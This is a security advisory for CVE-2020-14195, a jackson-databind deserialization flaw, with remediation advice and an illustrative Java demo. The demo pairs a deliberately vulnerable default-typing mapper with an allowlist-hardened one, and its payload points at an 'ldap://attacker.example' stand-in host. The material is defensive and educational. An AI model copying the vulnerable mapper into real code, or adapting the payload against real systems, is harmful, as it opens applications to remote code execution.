PT-2020-4416 · Fasterxml · Jackson-Databind

Published: 2020-06-16 · Updated: 2025-09-29 · CVE-2020-14195

CVSS v3.1: 8.1 (High)
Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: FasterXML jackson-databind versions 2.x before 2.9.10.5
Description: jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and polymorphic typing. When an application enables default typing (ObjectMapper.enableDefaultTyping()) or otherwise lets the JSON document choose the class to instantiate, and the jsecurity library is on the classpath, attacker-controlled JSON can name org.jsecurity.realm.jndi.JndiRealmFactory as the target type. Deserializing that class triggers a JNDI lookup against an attacker-supplied name, which can load a remote class and execute arbitrary code on the target system. Exploitation requires untrusted JSON to reach a mapper configured for polymorphic deserialization and the gadget class to be available on the classpath, which is reflected in the High attack complexity of the CVSS vector.
Recommendations: For FasterXML jackson-databind versions 2.x before 2.9.10.5, update to version 2.9.10.5 or later, which adds org.jsecurity.realm.jndi.JndiRealmFactory to the library's deserialization blocklist. Because the blocklist only covers gadget classes already known to the maintainers, also avoid enabling default typing for untrusted input; on 2.10 and later, replace enableDefaultTyping() with activateDefaultTyping() and a PolymorphicTypeValidator that allowlists only the intended types, and remove the jsecurity library from the application classpath if it is not needed.
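The following Java program is an added illustration of the mechanism behind this class of jackson-databind gadget CVEs; it is not code from the jackson-databind project, from jsecurity or from any exploit. It deserializes a constructed payload once with a mapper that enables unrestricted default typing and once with a mapper that restricts polymorphic types to an allowlist. Instead of JndiRealmFactory it uses a hypothetical stand-in class DemoGadget whose setter only records that it was called; the allowlist prefix com.example.app.handlers. is also hypothetical. It assumes jackson-databind 2.10 or later, where activateDefaultTyping and BasicPolymorphicTypeValidator exist.

```java
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Hypothetical stand-in for a gadget class (NOT JndiRealmFactory): any class on the
    // classpath with a setter whose side effect is dangerous when fed attacker data.
    // A real JNDI gadget would resolve the supplied name here; this one only records the call.
    public static class DemoGadget {
        static boolean setterInvoked = false;

        public void setTarget(String target) {
            setterInvoked = true;
        }
    }

    // The type the application actually intends to deserialize. The Object-typed field is
    // what lets the JSON document choose the concrete class once default typing is enabled.
    public static class Config {
        public Object handler;
    }

    // Constructed attacker payload (not from any real exploit). ["class", {...}] is the
    // WRAPPER_ARRAY encoding that default typing accepts for an Object-typed property.
    static final String PAYLOAD = "{\"handler\": [\"" + DemoGadget.class.getName()
            + "\", {\"target\": \"ldap://attacker.example/x\"}]}";

    // VULNERABLE configuration: default typing for Object/abstract/interface-typed
    // properties with no restriction on which classes the document may name. Only the
    // library's built-in blocklist stands in the way, which is why every newly found
    // gadget (such as the one in CVE-2020-14195) needs a new jackson-databind release.
    static ObjectMapper vulnerableMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE); // deprecated since 2.10
        return m;
    }

    // HARDENED configuration (2.10+): polymorphic typing only for an explicit allowlist of
    // subtypes. The package prefix is hypothetical; use the application's own handler types.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.app.handlers.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
        return m;
    }

    public static void main(String[] args) throws Exception {
        // The vulnerable mapper instantiates whatever class the document names and calls its setter.
        Config c = vulnerableMapper().readValue(PAYLOAD, Config.class);
        System.out.println("vulnerable mapper instantiated " + c.handler.getClass().getName()
                + "; gadget setter invoked = " + DemoGadget.setterInvoked);

        // The hardened mapper rejects the type id before any constructor or setter of the
        // named class runs, so the gadget never executes.
        DemoGadget.setterInvoked = false;
        try {
            hardenedMapper().readValue(PAYLOAD, Config.class);
            System.out.println("hardened mapper UNEXPECTEDLY accepted the payload");
        } catch (JsonMappingException e) {
            System.out.println("hardened mapper rejected the payload: " + e.getOriginalMessage()
                    + "; gadget setter invoked = " + DemoGadget.setterInvoked);
        }
    }
}
```

Compile and run with jackson-databind (and its jackson-core/jackson-annotations dependencies) on the classpath. The first line of output reports that the vulnerable mapper instantiated DemoGadget and that its setter ran; the second reports the hardened mapper refusing the type id with the setter flag still false. The same allowlist also blocks org.jsecurity.realm.jndi.JndiRealmFactory on versions that predate its addition to the blocklist, which is the practical value of an allowlist over a reactive blocklist.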

Weakness Enumeration

CWE-502: Deserialization of Untrusted Data

Related Identifiers

ALSA-2025_16880
ALT-PU-2021-1792
BDU:2020-04944
CVE-2020-14195
DLA-2270-1
GHSA-MC6H-4QGP-37QH
MGASA-2021-0153
RHSA-2020:4366
ROSA-SA-2025-2629
USN-4813-1

Affected Products

Alt Linux
Red Os
Ubuntu
Jackson-Databind